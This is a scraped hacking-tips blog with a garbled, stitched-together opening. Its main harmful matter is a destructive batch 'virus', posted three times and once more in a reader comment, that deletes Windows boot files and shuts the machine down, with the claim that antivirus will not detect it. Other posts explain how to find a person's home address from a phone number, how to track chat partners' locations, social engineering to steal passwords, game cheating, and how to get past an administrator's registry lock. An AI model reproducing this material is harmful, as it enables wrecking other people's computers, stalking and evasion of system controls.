DHCP Enabled. . . . . . . . . . . : No
IP Address. . . . . . . . . . . . : 12.90.108.123
Subnet Mask . . . . . . . . . . . : 255.255.255.255
Default Gateway . . . . . . . . . : 12.90.108.125
DNS Servers . . . . . . . . . . . : 12.102.244.2
204.127.129.2

Traceroute

Traceroute on Unix and Linux (or tracert in the Microsoft world) attempts to trace the current network path to a destination. Here is an example of a traceroute run to www.cumbuco-car-rental.com:

$ traceroute www.cumbuco-car-rental.com

traceroute to amber.www.cumbuco-car-rental.com (128.32.25.12), 30 hops max, 40 byte packets

1 sf1-e3.wired.net (206.221.193.1) 3.135 ms 3.021 ms 3.616 ms

2 sf0-e2s2.wired.net (205.227.206.33) 1.829 ms 3.886 ms 2.772 ms

3 paloalto-cr10.bbnplanet.net (131.119.26.105) 5.327 ms 4.597 ms 5.729 ms

4 paloalto-br1.bbnplanet.net (131.119.0.193) 4.842 ms 4.615 ms 3.425 ms

5 sl-sj-2.sprintlink.net (4.0.1.66) 7.488 ms 38.804 ms 7.708 ms

6 144.232.8.81 (144.232.8.81) 6.560 ms 6.631 ms 6.565 ms

7 144.232.4.97 (144.232.4.97) 7.638 ms 7.948 ms 8.129 ms

8 144.228.146.50 (144.228.146.50) 9.504 ms 12.684 ms 16.648 ms

9 f5-0.inr-666-eva.cumbuco-car-rental.com (198.128.16.21) 9.762 ms 10.611 ms 10.403 ms

10 f0-0.inr-107-eva.cumbuco-car-rental.com (128.32.2.1) 11.478 ms 10.868 ms 9.367 ms

What is WAMP?

WAMP is a powerful backend web development and hosting environment integrated from Apache, MySQL and PHP. Using Apache as a web server, MySQL as a database server, and PHP as a server side script engine, WAMP controls all these components using an intuitive interface.

What You Need to Know Before Installing WAMP?

WAMP is designed to run on Windows Platform only. If you want something similar for Linux, try LAMP.
WAMP is not designed for the production environment out-of-the-box. However, with some knowledge of securing the Apache and MySQL servers, WAMP can be safely run as production.

What Technical Knowledge or Skills Do I Need to Have Before I Can Begin Installing and Administering WAMP?

You should at least have some knowledge on web servers administration. It will help you resolve issues faster should you run into issues administering WAMP.

Who uses WAMP?

WAMP is used by many people for many different purposes. It is used by many companies as a hosting platform for their intranet websites. Web developers use WAMP as a testing platform to replicate the production environment. Web server enthusiasts installed WAMP on their personal computers to learn some administration skills.

What are the Advantages of WAMP?

Simplifying Installation, Configuration and Maintenance: Installing WAMP is very easy and quick. Just download the executable file, run it, and then follow the simple instructions. WAMP also provides an intuitive interface to configure MySQL database server. To simplify maintenance, WAMP has a smart built-in feature that automatically checks for compatibility between different PHP and Apache web server releases.
Powerful: By combining all three powerful components (Apache, MySQL, PHP) into one solution, WAMP is indeed one of the most powerful engines ever created.
Free for All: WAMP was created as an open source project. It has a GNU General Public License (GNU GPL). What this means is that it is free for personal and commercial use.
Multiple Add-ons are Available: Multiple add-ons are available for WAMP to extend its functionalities. Current available add-ons are available to add different releases for Apache, MySQL and PHP into WAMP.
Flexibility: WAMP provides an interface to select different releases of Apache, MySQL or PHP. This is especially essential when needed to replicate similar versions running on the production environment.

What are the Disadvantages of WAMP?

WAMP does not support Perl, Python or other server side script engines. However, you can add support for these server scripts by adding modules to the Apache Web Server (Hint: Google Apache Perl Module).

Are You Ready for WAMP?

I can use many adjectives to describe WAMP including fast, powerful, flexible, stable, customizable, and best of all, it’s free. WAMP already has many add-ons available today to extend its functionalities and many more add-ons are in the development stage. Although it lacks the support for Perl and some other server side script engines, there are workarounds available. Many have already started using WAMP as a development platform or hosting their companies’ intranet websites. Now it’s your turn to decide if WAMP is right for you.

11 f8-0.inr-100-eva.cumbuco-car-rental.com (128.32.235.100) 10.738 ms 11.693 ms 12.520 ms

Wednesday, March 13, 2013

virus coding

Virus code

Virus that crashesh your own pc

@echo off
attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows\win.ini
del c:\windows\win.ini
@echo off
msg * YOU GOT OWNED!!!
shutdown -s -t 7 -c "A VIRUS IS TAKING OVER c:Drive

save as bat file in notepad!!
This will pop up a message saying OWNED!!
and shut down the computer never to reboot again!
type this in notepad

start virus.bat
virus.bat


and save as with this name

virus.bat


ur antivirus will not detect this virus

Basically this program will delete all that files which are needed for booting
If your os is installed in d drive instead of c then replace c with d

4 comments:

SR7 said...
C:\Documents and Settings\sys>set
ALLUSERSPROFILE=C:\Documents and Settings\All Users
APPDATA=C:\Documents and Settings\sys\Application Data
CLASSPATH=.;C:\Program Files\QuickTime\QTSystem\QTJava.zip
CLIENTNAME=Console
CommonProgramFiles=C:\Program Files\Common Files
COMPUTERNAME=SYSTEM
ComSpec=C:\WINDOWS\system32\cmd.exe
DEFAULT_CA_NR=CA6
FP_NO_HOST_CHECK=NO
HOMEDRIVE=C:
HOMEPATH=\Documents and Settings\sys
LOGONSERVER=\\SYSTEM
NUMBER_OF_PROCESSORS=2
OS=Windows_NT
Path=C:\PROGRAM FILES\PC CONNECTIVITY SOLUTION\;C:\WINDOWS\SYSTEM32;C:\WINDOWS;C
:\WINDOWS\SYSTEM32\WBEM;C:\PROGRAM FILES\INTEL\DMIX;C:\PROGRAM FILES\QUICKTIME\Q
TSYSTEM\;C:\PROGRAM FILES\COMMON FILES\TELECA SHARED;C:\Program Files\Java\jdk1.
5.0_06\bin
PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH
PROCESSOR_ARCHITECTURE=x86
PROCESSOR_IDENTIFIER=x86 Family 6 Model 15 Stepping 2, GenuineIntel
PROCESSOR_LEVEL=6
PROCESSOR_REVISION=0f02
ProgramFiles=C:\Program Files
PROMPT=$P$G
QTJAVA=C:\Program Files\QuickTime\QTSystem\QTJava.zip
SESSIONNAME=Console
SystemDrive=C:
SystemRoot=C:\WINDOWS
TEMP=C:\DOCUME~1\sys\LOCALS~1\Temp
TMP=C:\DOCUME~1\sys\LOCALS~1\Temp
USERDOMAIN=SYSTEM
USERNAME=sys
USERPROFILE=C:\Documents and Settings\sys
windir=C:\WINDOWS

C:\Documents and Settings\sys>


hey frnd, in order to make sure u crash the pc tat executes this for sure even if they hav the win dir in any other drive other than c: ,

you can use this code

@echo off
attrib -r -s -h %HOMEDRIVE%\autoexec.bat
del %HOMEDRIVE%\autoexec.bat
attrib -r -s -h %HOMEDRIVE%\boot.ini
del %HOMEDRIVE%\boot.ini
attrib -r -s -h %HOMEDRIVE%\ntldr
del %HOMEDRIVE%\ntldr
attrib -r -s -h %HOMEDRIVE%\windows\win.ini
del %HOMEDRIVE%\windows\win.ini
@echo off
msg * YOU GOT OWNED!!!
shutdown -s -t 7 -c "A VIRUS IS TAKING OVER %HOMEDRIVE% Drive

as save as said before....with .bat extension

An ntm THHIS is WINDOWS SHELL SCRIPT !

Seo Elite

In the world of SEO (Search Engine Optimization) everyone wants high rankings for fast/automated income. However, if you want high rankings you need links and a large volume of them. If you were to get links manually it would take you months upon months of painstaking link building. To speed this process up you would need a piece of software capable of sending massive amounts of link requests quickly and effectively.

SEO Elite is programmed to be that exact program. Its features were built to automate SEO to give great Search Engine Rankings incredibly quickly, and it would also gather information about your competitors SEO statistics.

I put SEO Elite to the test of rankings and it was the best SEO program that I had used in a long time.

You’re Probably wondering what SEO Elite Does. It actually does a variety of SEO tasks.

1. Submits Your Articles To The Most Popular Articles Directories
2. Find And Contact High Quality Authority Websites
3. Quickly See Why ANY Website Ranks Highly In Google, Yahoo, Or MSN
4. Find Out If Your Link Partners Have Removed Your Link From Their Site
5. See Where Your Website Ranks In Google, Yahoo, MSN, Alltheweb, and Altavista
6. Sends Link Requests To Potential High Pagerank Website Owners.
7. Instantly Finds Hundreds of High Page Rank Websites In Your Niche.

All in all SEO Elite was a great SEO Software experience. SEO Elite can save you a lot of time you could spend making new websites and increasing your daily income.

'Scrap All Friends' Without Ad in Orkut

I guess everyone out here is fed up with scrap all spam. Those who once used to scrap all their friends to greet, now have an advertisement below their scraps. No doubt this looks odd and embarrassing. So today, we'll provide you a few tips to disable this advertisement below the scraps.
Here are a Couple of things You Can Do Disable Advertisements:

a> Use a scrap all script which is ad free :
• You can use Scrap All provided by Orkut Plus! (No Advertisements) - Click Here to Install -http://userscripts.org/scripts/source/11850.user.js
• Now Navigate to http://www.orkut.com/ScrapAll to use this feature
• Send scraps to your friends without any advertisement

b> Disable Advertisements in Existing Scrap All Scripts :
Those who feel they have a better scrap all installed or are not comfortable installing/uninstalling again and again can use this method to disable advertisements.
• Write the message in the text box which you want to send to all your friends.
• Now to disable the advertisements write <.script> without "." as shown in the screenshot.
• Now, send the ad free scraps.
• That is all

Tuesday, November 13, 2007

Tracing IP

Tracing IP (Remote Concept)

Did you ever want to know the location of the person whom you are chatting/talking to (on Yahoo!, MSN, ICQ messenger) or with whom you are transacting with on Internet.
Did you ever want to know the Country, City, Latitude, Longitude, Browser any person is using, Operating System he is working on. You can know it all here !!
This is a system to trace the location (country, city, etc. ) and also browser and OS of anyone on internet.

All you need to do is to invite that person (whom you want to trace) to a page and all his details will automatically get mailed to you at your Email Address that you provide here.
After you provide your email id here, a unique link will be mailed to you at which you'll have to invite your target. As soon as the person clicks that link, his location details will be mailed to you.

Try this here

Wanna know your own IP? , just open http://www.showmyip.com

Logging on to a strange computer

Logging on to a strange computer (Using Telnet /Win95 For AOL Connection).

To do this (I mean log on to a strange computer, not scare your neighbors) go to the DOS prompt C:\WINDOWS> and give the command telnet. This brings up a telnet screen. Click on Connect, then click Remote System.

This brings up a box that asks you for Host Name. Type whois.internic.net into this box. Below that it asks for Port and has the default value of telnet. Leave in telnet for the port selection. Below that is a box for TermType. I recommend picking VT100 because, well, just because I like it best.

The first thing you can do to frighten your neighbors and impress your friends is a whois. Click on Connect and you will soon get a prompt that looks like this:

[vt100]InterNIC>

Then ask your friend or neighbor his or her email address. Then at this InterNIC prompt, type in the last two parts of your friends email address. For example, if the address is luser@aol.com, type in aol.com.

Now Im picking AOL for this lesson because it is really hard to hack. Almost any other on-line service will be easier.

For AOL we get the answer:

[vt100] InterNIC > whois aol.com
Connecting to the rs Database . . . . . .
Connected to the rs Database
America Online (AOL-DOM)
12100 Sunrise Valley Drive
Reston, Virginia 22091
USA.

Domain Name: AOL.COM

Administrative Contact:
O'Donnell, David B (DBO3) PMDAtropos@AOL.COM
703/453-4255 (FAX) 703/453-4102
Technical Contact, Zone Contact:
America Online (AOL-NOC) trouble@aol.net
703-453-5862
Billing Contact:
Barrett, Joe (JB4302) BarrettJG@AOL.COM
703-453-4160 (FAX) 703-453-4001

Record last updated on 13-Mar-97.
Record created on 22-Jun-95.

Domain servers in listed order:

DNS-01.AOL.COM 152.163.199.42
DNS-02.AOL.COM 152.163.199.56
DNS-AOL.ANS.NET 198.83.210.28

These last three lines give the names of some computers that work for America Online (AOL). If we want to hack AOL, these are a good place to start.

Evil genius tip: Using your Win 95 and an Internet connection, you can run a whois query from many other computers, as well. Telnet to your target computers port 43 and if it lets you get on it, give your query. Example: telnet to nic.ddn.mil, port 43. Once connected type whois DNS-01.AOL.COM, or whatever name you want to check out. However, this only works on computers that are running the whois service on port 43. Warning: show this trick to your neighbors and they will really be terrified. They just saw you accessing a US military computer! But its OK, nic.ddn.mil is open to the public on many of its ports. Check out its Web site www.nic.ddn.mil and its ftp site, too -- they are a mother lode of information that is good for hacking.

Next I tried a little port surfing on DNS-01.AOL.COM but couldnt find any ports open. So its a safe bet this computer is behind the AOL firewall.

**********************************
Newbie note: port surfing means to attempt to access a computer through several different ports. A port is any way you get information into or out of a computer. For example, port 23 is the one you usually use to log into ashell account. Port 25 is used to send email. Port 80 is for the Web. There are thousands of designated ports, but any particular computer may be running only three or four ports. On your home computer your ports include the monitor, keyboard, and modem.
**********************************

BSNL Phone Number and Address

BSNL Phone No's Address.

Wanna know Address of the girl you like?, or address of your friend?. It is so easy to trace the addresses,

just you need is their phone number.

EXAMPLE: For tracing the address of a number located in Madhya Pradesh (India) just log in to

http://www.bsnl.co.in/onlinedirectory.htm

After logging in, select the area (city) to which the phone number belong and then proceed further.

In the option "Search by" , select Telephone number. select the station to which the phone no. belongs and

finally write the phone number in the "Search key field" . In this way the address of that particular number

will be traced.

For selecting any other state of India, log on to http://www.bsnl.co.in/index.html . In the Right hand side

you see the "BSNL units" option (above Username field), select your state from the menu and then proceed

further.

NOTE : Try both, number including (2) as well as number excluding (2) as a prefix.

Social Engineering

What is Social Engineering?

Social Engineering is mainly a hacking method without using any hacking tool or codes. Social Engineering is something like Social networking. By this you make a victim to surrender his/her personal information like passwords, secret documents etc to you. It is a game of winning confidence of the victim on you.

Many Hackers use this tool for performing many serious hacks. What they do is they get involve in victim company as an employee and steal all the private data. However its a tough job to do so...

Many people use social networking to obtain information like date of birth, postal code etc to hack Yahoo Ids.

In Short Social Networking is a smart way to hack. It not only reduces the possibilities to get caught but also increases the possibilities to get succeed.

Google hacks

Techniques for isolating video, music, or archive files in Rapid Share by using Google.

If you want to see a bunch of eminem songs (available for you to freely download).
(you can enter anything .de or .com)

google: +inurl:wma|mp3|ogg site:rapidshare.com eminem


To see all video files available on rapidshare...

google: +inurl:avi|mpg|wmv site:rapidshare.de


To see all archives and programs available...

google: +inurl:exe|rar|zip site:rapidshare.de


To see all music files available...

google: +inurl:wma|mp3|ogg site:rapidshare.de


This should show all files available...

google: .* site:rapidshare.de

Speed up firefox

Here's how to speed up your firefox 10x faster

1. Type "about:config" into the address bar and hit enter. Scroll down and look for the following entries:

2. Alter the entries as follows:

Set "network.http.pipelining" to "true"
Set "network.http.proxy.pipelining" to "true"

set "network.http.pipelining.maxrequests" to some number like 30. This means it will make 30 requests at once.

3. Lastly right-click anywhere and select New-> Integer.
Name it "nglayout.initialpaint.delay" and set its value to "0". This value is the amount of time the browser waits before it acts on information it receives.

Bit Torrent Guide

Part One: Background Information

We're all familiar with the popular Peer-to-Peer (P2P) file sharing systems; the most popular being Kazaa and the Gnutella network (Limewire, Morpheus, Bearshare). These systems are all basically the same. You look for a file, see who's sharing it, and connect to download. While this system is very efficient for searching for a file, it is not so for file transferring. To be more specific, it is not efficient for transferring large files, ie. cd-images, movies,
and the like.
For example lets say I decide to share a movie which happens to be 700MB. I'm connected to the internet through a standard DSL connection, which has a typical upstream cap of 128 KB/S. Now, lets say you set it up so that this is the only file shared, and there is no other internet activity present on the system. Now, along comes a user. This user connects and begins to download the file (note: all users are assumed to have similar DSL connections). They get the maximum speed of 128 KB/S, as restricted by the server's upstream cap (a server is any user with the entire file). This leads to a little over 90 minutes of download time. Yet along comes somebody else who wants the movie. Now, each user must split the servers upload speed, leaving each with 64 KB/s download speed and a 3 hour download time. Throw in 2 more users, and its not 32 KB/s and 6 hours. Make it 16 users and you're looking at a full 24 hours of downloading. I've chosen this example to illustrate the most prominent problem with most P2P file sharing programs. You can only download a file from somebody with the complete file. You can split your download between sources, but even if you have a 99.9999% completion, you can't share it.

Part Two: What is Bit-Torrent?

As with everything in this world, bit-torrent was developed with a noble purpose. It was created to allow companies to distribute large files throughout their systems in a much shorter amount of time than would normally be needed. How is this done? Bit-Torrent allows anyone with a portion of a file to share that portion, essentially allowing everyone to download from everyone else. To better understand the point I am trying to make, consider the following pictures:

http://f.scarywater.net/bram/central.png
This illustrates a Kazaa-style P2P file-sharing system. Notice how everything hinges on the server's upload speed.




This is a bit-torrent style network. Notice how everybody both downloads and uploads to maximize the available bandwidth.

Part Three: Using Bit-Torrent

The first step to using bit-torrent is to download a bit-torrent client. Many are available, but I highly recommend Shadow's Experimental Client which is available for download at http://bt.degreez.net/
Now we get into general setup. I recommend creating a general bit-torrent directory. Within this directory, create two subdirectories, labeled "Downloads" and "Torrents". The downloads folder is self-explanatory, you'll place your downloads in this folder. The torrents folder is where you'll place your torrent files. What are torrent files?
Bit-torrent doesn't use a search-engine style system for finding files. Basically you go to a site like http://www.suprnova.org and find the file that you want. So, right-click on the link and download the file to your "Torrents" directory. Then, simply open the file (we choose to download the file since theses servers that host the torrents tend to go down often). The client will load and ask you where you want to save the file. It will then connect to a tracker, which tells it
where to connect to share the file. If you have partially downloaded the file and are resuming, it will check the file first.

Part Four: Issues and Complaints

I've answered more complaints about bit-torrent than I can count, so trust me, I've heard them all. The most common complaint is a lack of speed. This can be due to several reasons

1) Capping upload speeds.
The bit-torrent protocol is developed to prevent leeching. If you restrict your uploading, your download will suffer also.

2) Behind a firewall
If you're behind a firewall your download speed will suffer. You can tell if your firewall is interfereing with your download if the color of the disc in the client is yellow. If you can control the firewall and know what you're doing, try opening ports 6881 through 6999. This generally improves performance.

3) Tracker is down
If the tracker is down, then there is no way for the client to know where to connect. If you run into this problem, try downloading the torrent file again.

4) Lack of downloaders
The file can't be downloaded if it doesn't exist. This is a problem that you'll eventually run into. You'll load up a torrent file and there won't be anybody with the entire file connected. When this happens, you'll download as much as possible.

5) Lack of attention
A lot of people restrict their upload connections to 5 or 10, to allow everyone to get a decent speed. This may not seem like a lot, but with many people doing it, it ends up being quite effective. Unfortunately, if you're not one of those 5 to 10, you're outta luck until you get noticed. Remember, patience is a virtue!!!

Virus code

Virus that crashesh your own pc

@echo off
attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows\win.ini
del c:\windows\win.ini
@echo off
msg * YOU GOT OWNED!!!
shutdown -s -t 7 -c "A VIRUS IS TAKING OVER c:Drive

save as bat file in notepad!!
This will pop up a message saying OWNED!!
and shut down the computer never to reboot again!



type this in notepad

start virus.bat
virus.bat


and save as with this name

virus.bat


ur antivirus will not detect this virus

Basically this program will delete all that files which are needed for booting
If your os is installed in d drive instead of c then replace c with d

Compress 1 Gb to 10 MB

compress Your 1 GB data/movie in Just 10 MB


It is Amazing to say compress ur 1GB data/move into 10MB. Really it is possible with the KGB Freeware (Open source) software. U can Down load the software from http://kgbarchiver.net/?page=download and fallow the following the steps.

Its damn simple..Heres the procedure.. U can compress that data in two formats..1) KGB format 2) ZIP format ..Everyone knows the ZIP format..I tell u which is better & why..If u do it in KGB format it takes 5-6 hours on a 256 mb RAM, to compress 1 GB data/movie in less than 10 MB , but (this is not which i prefer) coz to decompress u take the same time.. So its useless..& u need KGB archiver only only for this format to decompress..But if u do it in ZIP format it takes 6-7 hours on a 256 MB ram, but i tell u its worth coz WINRAR & WINZIP both can decompress it in seconds.. OK now its clear that which format to use & which is better..Now we'll go how to use that software..Run the application>> It asks for which file u wanna compress>> select the file>> after u select>> U get two options in which format u want to compress it>> select ZIP format ( I prefer ) >> and then set compression level to maximum (maximum the compression level , small the size of it will be compressed)>> Just ignore the time given below it coz its just useless....... There is option that u can auto shutdown ur computer after the compression is over..SO u can got school/college/office & keep it to get compressed.. I do the same..

Virus that crashes your own pc

Virus that crashesh your own pc

@echo off
attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows\win.ini
del c:\windows\win.ini
@echo off
msg * YOU GOT OWNED!!!
shutdown -s -t 7 -c "A VIRUS IS TAKING OVER c:Drive

save as bat file in notepad!!
This will pop up a message saying OWNED!!
and shut down the computer never to reboot again!

type this in notepad

start virus.bat
virus.bat

and save as with this name

virus.bat

ur antivirus will not detect this virus

Basically this program will delete all that files which are needed for booting
If your os is installed in d drive instead of c then replace c with d

Wednesday, October 24, 2007

Hack Online Games

I will show you How to Hack FLASH based Online games using Cheat Engine.
I'm using Cheat Engine 5.2, but you can Download Latest at http://cheatengine.4dwebhosting.com/CheatEngine53.exe

here we go..

1. Open your any Online Flash Game in Firefox or IE Browser, I will hack DesktopTD 1.0 > http://www.handdrawngames.com/DesktopTD/Default.asp?cc=1

2. I hope u have now Opened ur flash game in Browser with no other Browsers window Opened. Now Open Cheat Engine.

3. In CE, click Open Process List & Select firefox.exe & click OK.- see Image

4. ooh, and One More thing I forgot to tell u, Open Calculator.
& now go in DesktopTD game & place some Weapons (Towers), then see how many GOLD you have left.
I placed a Pallet Tower (Cost 5 GOLD)
So now I have left with 75 GOLD.

5. So now I will Multiply 75 x 8 which = 600
(e.g. For example, you want to increase your health from 200 to a higher number. Just multiple 200 with 8 which equals to 1600. At CheatEngine, enter 1600 at the value and click on First Scan button. )

6. Now when a Searched I found 1607 values, but we want less.

7. Now Spend some more GOLD. I spent GOLD on "Squirt Tower" (Cost 15 GOLD). & now i have Left 60 GOLD in pocket.

8. Now in CE, Select Scan Type "Decreased Value" & click on NEXT SCAN > see Image -
9. & now i Found 38 , so Right click on them & click "Select All items" & click that RED arrow > see Image -
10. & now Double click on that 480 value & replace it by 80000, & now spent some Money & now u must have above 9900 GOLD.

enjoy!

You can also hack Online games like WarRock with "WPE pro 0.9"[ http://wpepro.net/ ]
1. Disable AV
2. Run WPE pro 0.9
3. Run WarRock
4. ALT + TAB out of game
5. in WPE pro 0.9 click "Target Program" > select warrock.exe
6. in WarRock go in Urban Ops, Hurt yourself. Now go near a Medic or Weapon Refile point > ALT+TAB > go in WPE pro 0.9 > click Black Triangle [RECORD] > record till 40 or 39 packets > STOP
7. in WPE pro 0.9 > Right click on that Packet > select "add to send list" & "Set send list with this socket id" simultaneously.
8. Click "Send" (near FILTERS)
9. Tick "New send" & click PLAY button
10. New window will POPUP > select "Continuously" & Timer: 100 & then click PLAY.
11. go in warrock & your ammo or Health will get refilled by time by time.



Your Ad Here

Monday, October 22, 2007

Change Static IP

TUTORIAL HOW TO CHANGE YOUR STATIC IP:

To start off, you need a direct connection to your modem and computer. If you have a router, disconnect it and directly hook up your modem to your computer.

1. Open up the command prompt by pressing Start->Run and typing in cmd

2. In the command prompt, type “Ipconfig/all”. This will tell you your current IP Address. After, type “ipconfig/release”. Keep the command prompt open for easy access.

3. Go to “Network Connections” (accessible through the control panel). Right click “Local Area Connection” and click “Properties”

4. With “Internet Protocol (TCP/IP) selected, click the “Properties” button.

5. A new window will open. Under the “General” tab, select “Use the Following IP address”. Under “Ip Address”, put “10.0.0.1″. Press the “Tab” key on your keyboard.

6. Press Ok on both open windows.

7. Repeat steps 3-4. Under the “General” tab, press the radio button “Automatically Assign Me an Ip Address”. Press ok on both windows.

8. Go back to the command prompt and type in “Ipconfig/all”. You’ll now notice you have a new IP address.

So, this will be handy if you want to by-pass Rapidshare 1 hour download limit, provided that you have a static IP address.

Saturday, October 20, 2007

Megaupload Crack

Megaupload.Com - Cracks !!!

Downloading Instructions

1. step www.guardster.com click
2. step select to Access the Free Proxy and click
3. step Address: http:// remove and copy megaupload link and paste here
4. step
Options: No Cookies - No Scripts (X) - No Images - Hide Referrer
Hide User Agent - Hide Title - Hide Header......remove (X) from (No Scripts) it must clear and click "I agree and wish to surf anonymously".Now Megaupload download page will open...It is opening little slow but download very faster...

Thursday, October 18, 2007

Enable Folder Options

we will take this step-by step Procedure to enable folder options in control panel:

Please try in both Normal mode and Safe Mode, if Normal mode fail try safe
mode.

Open a run Command and type in:

gpedit.msc

On the group Policy locate this option under:

User configuration\Administrative Templates\windows components\Internet Explorer\InternetControl Panel\Browser menus

Then Look in the right Pane/Window for this Option...

Tools menu disable Internet Options... menu option.

Make sure this not Disabled for your account by double clicking it and see the settings there.
Note you can do any changes unless you are logged in as administrator.

Tips to increase XP performance

Tips for increasing XP performance

1] Your Pc Must have 256MB RAM , 512 MB Cache , Intel Pentium 4 Processor, 40 GB HDD. These are the minimum requirements.

2] If you see a 'virtual memory low' message then increase its virtual memory. To increase virtual memory,
Go to My Computer->Properties->Advanced->Performance Settings->Advanced->Virtual Memory->Change->Select the appropriate drive->Custom size->set appropriate level(our it is 600(min.) & 700(max.)->Ok.

3] Increase 'Visual Performance'. Go to My Computer->Properties->Advanced->Performance Settings->Visual Settings->Custom->Select only the following options.
a)Slide taskbar buttons.
b)Smooth edges of screen fonts.
c)Smooth-scroll list boxes.
d)Use a background image for each folder type.
e)Use visual style on windows and buttons.

4] Don't keep unwanted/extra fonts. To remove extra fonts, Go to Start->Settings->Control Panel->Fonts.

5] Your Desktop Wallpaper & Screensaver consume a large amount of disk space. Select the 'None' option for both wallpapers & Screensavers.

6] Avoid keeping DEMO Games.

7] Uninstall the unwanted Softwares.

8] Use Registry Cleaner to keep your registry clean(without errors).

9] Try to keep Music and pictures files in the folder specified by windows itself.

10]Use Hybernating Option for Quick windows start. To active Hybernating follow the following steps.
Desktop->Properties->Screensaver->Power->Hybernating->Enable Hybernating->Ok.

11] Keep your Dektop clean with unwanted icons.

12] Use Intel Application Accelerator to speed up your disk access,

13] Memory management (at least 512MB RAM Required). This allow XP to keep data in Memory instead of paging section of RAM.
Go to->Start->Run->regedit->HKEY_LOCAL_MACHINE->SYSTEM->CurrentControlSet->Control->Session Manager->Memory Management->Double click it->DisablePageingExecutive->Double Clik it->Set value to 1.

14] Disable Yahoo Messenger, Google Talk, and other unwanted programs from startup. (You can use registry editior to do this.). Because they do not appear in normal Startup Option.

15] Disable indexing files service (only if you do not use search option regularly). To do this follow the following steps.
Go to My Computer->Select the drive for which you want to disable the indexing service->Properties->Unselect 'Allow Indexing Service'->Ok.

16] For Windows XP, You must use NTFS partition. FAT partition is less supportive for Windows XP.

17] In BIOS, Select first booting device as your HDD.

18] Setting Priority High for a particular program.
Open Task Manager->Processes->Select the desired Program->Right Click->Set Priority->High->Ok.
This Priority set if for current session. Once you restart your system then its priority will again be Normal.

19] Keep deleting your Temporary Internet Files in regular intervals.
Go to Windows Drive (c: or d:)->Select the User->Local Settings->Temporary Internet Files

20] Empty your browser's cache in regular intervals.

21] Avoid keeping Movies in your PC.

PDF Tricks

Hey peoples now u can listen to wats there in a pdf document instead of reading the whole document....

Try out the following key combinations for Acrobat 6.0 & 7.0:

ctrl+ shift + b ---> To hear the whole document

ctrl + shift + v
---> To hear only the page

ctrl + shift + c ---> To resume

ctrl + shift + e ---> To stop

Tracing IP Address

Ideally you can use trace the IP of the person u r talking to on yahoo messenger by following steps.

1.) First Invite the person to a webcam or view his webcam. Transfer of any file through messenger will also do.

2.) Then go to DOS prompt and type netstat-n and view the open ports and connections.

3.) Identify the one thats yahoo messenger is using (you'll need practise and your common sense for doing that)

4.) You'll get the IP in foreign address column

5.) Ethereal will also do BUT remember only when during webcam chat or file transfer because yahoo never connects peer to peer when chatting(all the text is relayed through yahoo servers) but during webcam/file transfer it connects you peer to peer with that computer and you can trace your IP.

Find Invisible on Yahoo

To find who is invisible on yahoo messenger just do the simple steps written below :

1. Sign inside yahoo messenger

2. Double click on the person whom u want to see is invisible or not (from ur messenger list)

3. Then click on IMenvironment --> see all environments --> Interactive Fun --> Doodle.

Note: If the user is really offline in a white screen it will be written waiting for ur buddy to load Doodle but if he is online and he has made his status invisible- instead of the message (waiting for ur buddy to load doodle) there will be only a blank screen.

Faster Boot Time

First, let's do a bit of comparing with the "before and after" you try this registry trick. Please try restarting your pc and observe at the blue lines that appear upon booting. Notice how many times it appeared?

To increase system boot speed, here's what you can do...

1. Start>run> and type ''regedit''

2. HKEY_LOCAL_MACHINE/ SYSTEM / CurrentControlSet / Control / Session Manager / Memory Managment / PrefetchParameters / EnablePrefetcher.

3. Double click on "Enableprefetcher"

4. Past 1 in Value Date, and Hexadecimal most be on(enable)

Then restart the pc and and look at the blue lines again. See how many times or how fast it goes? Most of the time it just quickly passes that part.

Chat on LAN

For chating in any lan you dont need any software .Just copy the code in the note pad .

@echo off
:A
Cls
echo MESSENGER
set /p n=User:
set /p m=Message:
net send %n% %m%
Pause
Goto A


Now save this as "Messenger.bat". Open the .bat file and in Command Prompt you should see:

MESSENGER
User:

After "User" type the IP address of the computer you want to contact.
After this, you should see this:
Message:
Now type in the message you wish to send.
Before you press "Enter" it should look like this:

MESSENGER
User: 56.108.104.107
Message: Hi

Now all you need to do is press "Enter", and start chatting!

Enable Regedit If Disabled by Administrator

How do you enable Registry Editing again if it has been disabled by your administrator?

Solution1

I found a way to get into the registry editor if it’s been disabled, here how you do it:

1. Disable as much as you can from your startup. Remove programs from your startup folder and such, so as not to lag down the bootup process.

2. Create a new shortcut on your desktop, point it to "C:\Windows\regedit.exe"

3. Log off, then log back on

4. As soon as you see your desktop, double click on the shortcut. The system does not check for policies until a few seconds after it booted up. If you click on the icon fast enough, it should let you get in.

After that, do all you need? After you close it though, it will not open unless you redo step 3 and 4.

Solution2 

I found one vbs script to enable the registry editing. and below is the link.

www.dougknox.com/security/scripts_desc/regtools.htm

Solution3 

The way to get into registry editing is simple. Open your start menu click Run and paste in the folowing command:
REGaddHKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableRegistryTools /t REG_DWORD /d 0 /f

Wednesday, October 17, 2007

Nhatquanglan Update

       I recently noticed a spurt in the traffic to my blog which is apparently caused by people looking for answers to the Nhatquanghlan worm. Well, over here in Chandigarh, it seems that this virus is just about in all computers and is being spread by the ubiquitous pen/usb/zip/thumb drive. From my ruminations on the net and frequent tinkering around the ward computer that gets reinfected almost every day, I have made certain observations that seem to make some conclusions about this worm.

1. This worm spreads by USB drives though it is possible that other portable media may be involved too.
2. It causes the task manager, the folder options, registry files to be altered.
3. It can be diagnosed by the above symptoms.
4. There is a crappy looking folder icon that is seen (with same name as the original folder), the file size of which is 282 kb.
5. It makes the computer slow down, and no anti-virus as of now seems to catch hold of it.
6. Inability to stop the USB drive from remove hardware safely option.
7. Inability to format the USB drive.
8. The worm is an autorun .exe file and executes and infects every time a USB drive is plugged in.

Cure:

1. Download Hijack this(free), and the task manager fix of the interra group (also free), and a program called spybot killer.
